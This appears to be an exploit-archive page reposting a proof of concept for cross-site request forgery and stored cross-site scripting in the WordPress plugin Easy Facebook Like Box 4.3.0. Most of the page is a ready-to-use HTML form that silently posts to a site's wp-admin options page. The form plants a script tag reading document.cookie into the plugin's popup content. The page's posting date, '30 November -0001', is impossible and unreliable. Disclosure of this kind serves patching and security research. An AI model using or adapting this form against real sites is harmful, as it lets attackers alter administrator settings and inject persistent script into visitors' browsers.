Home / exploitsPDF  

WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / XSS

Posted on 30 November -0001

<HTML><HEAD><TITLE>WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / XSS</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : WordPress Plugin Easy Facebook Like Box 4.3.0- Cross-Site Request Forgery / Persistent Cross-Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : https://wordpress.org/plugins/easy-facebook-likebox/ # Category: [ Webapps ] # Tested on: [ Win ] # Version: 4.3.0 # Date: 2016/11/19 ###################### # # PoC: # CSRF and stored XSS vulnerability in Wordpress plugin Easy Facebook Like Box 4.3.0 # The Code for CSRF.html is : <form method="post" action="http://localhost/wp/wp-admin/options.php"> Like box pup up settings </br> <input type='hidden' name='option_page' value='efbl_settings_display_options' /> <input type="hidden" name="action" value="update" /> <input type="hidden" id="_wpnonce" name="_wpnonce" value="aa27b52873" /> <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=easy-facebook-likebox&amp;tab=autopopup" /> </br> Enable PopUp<input type="checkbox" id="efbl_enable_popup" name="efbl_settings_display_options[efbl_enable_popup]" value="1" checked /> </br> PopUp content<textarea id="efbl_popup_shortcode" name="efbl_settings_display_options[efbl_popup_shortcode]" rows="5" cols="50" placeholder=""> For Testing D:<script>alert(document.cookie)</script></textarea><br /> </br> <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /> </form> # ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : http://persian-team.ir ###################### </BODY></HTML>

 

TOP

Malware :